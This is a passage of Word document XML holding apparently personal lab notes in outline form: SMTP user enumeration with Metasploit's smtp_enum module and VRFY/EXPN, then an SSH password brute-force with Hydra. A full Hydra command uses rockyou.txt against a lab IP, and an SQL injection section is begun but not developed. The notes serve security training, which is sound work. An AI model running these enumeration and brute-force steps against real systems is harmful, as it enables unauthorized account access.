    <w:p w14:paraId="47662C4C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating Users from SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE328E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SMTP service has two internal commands allowing enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA64E59" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>VRFY – confirming names of valid users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73188139" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>EXPN – reveals actual address of user’s aliases and lists of emails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E226032" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Done with Metasploit “smtp_enum”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D114A3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Feed module host or range of hosts to scan as well as wordlist containing usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B118D15" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E0644" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metaplsoit and update/upgrade via sudo apt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21233BEB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE5859" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration technique will work for majority of SMTP configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24502E18" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Non Metasploit tools such as smtp-user-enum for OS-level user accounts on Solaris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33050771" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Performed by inspecting responses to VRFY, EXPN, and RCPT TO commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB40C8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Using Metasploit for SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF1247A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search smtp_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1144C5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A881B59" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428E00BF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Need to set RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF69F0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36501220" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check system mail name next to ESMTP Postfix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D42BB8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Postfix = mail transfer agent (MTA) running SMTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E005E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search “smtp_enum”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80FDC6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Set USER_FILE to /usr/share/seclists/Usernames/top-usernames-shortlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459476C9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>RHOSTS - &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9DDF66" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>THREADS – 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229038DA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1D326" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6E0504" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Following enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC3245F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>User account name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B573A04" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Type of SMTP server and operating system running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C595557" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SSH also running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2BB2AF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attempt bruteforce via Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972D9BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Rockyou.txt in /usr/share/wordlists/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4617EC5F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Additional lists in SecLists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3C1B8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Syntax: hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.105.120 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBB7514" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hydra – runs the tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8753CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-t 16 – parallel connections to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A71A58" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-l [user] – points to user who’s account trying to be compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAA7C69" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-P – path to dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007384D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-vV – increased verbosity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABBE486" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>[machine IP] – target IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453AE044" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ssh/protocol – sets the protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA721B" w14:textId="26E890D5" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find password, access ssh and explore target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43090E06" w14:textId="32C18ECE" w:rsidR="00EE7E9D" w:rsidRDefault="00EE7E9D" w:rsidP="00EE7E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E5A0D" w14:textId="7A092237" w:rsidR="00EE7E9D" w:rsidRDefault="00EE7E9D" w:rsidP="00EE7E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Basics of SQL Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B72A465" w14:textId="72145E74" w:rsidR="0059480D" w:rsidRDefault="0059480D" w:rsidP="0059480D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>List of SQL Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127870F8" w14:textId="103620C9" w:rsidR="0059480D" w:rsidRDefault="007A6E65" w:rsidP="0059480D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="0059480D" w:rsidRPr="00DF6751">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.codecademy.com/articles/sql-commands</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2533EB8F" w14:textId="77777777" w:rsidR="0059480D" w:rsidRDefault="0059480D" w:rsidP="0059480D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124661B3" w14:textId="21C27E94" w:rsidR="00EE7E9D" w:rsidRDefault="006B39DB" w:rsidP="00EE7E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SQL by itself is a domain-specific language used in programming for managing databases by reading operating data</w:t>
      </w:r>
    </w:p>
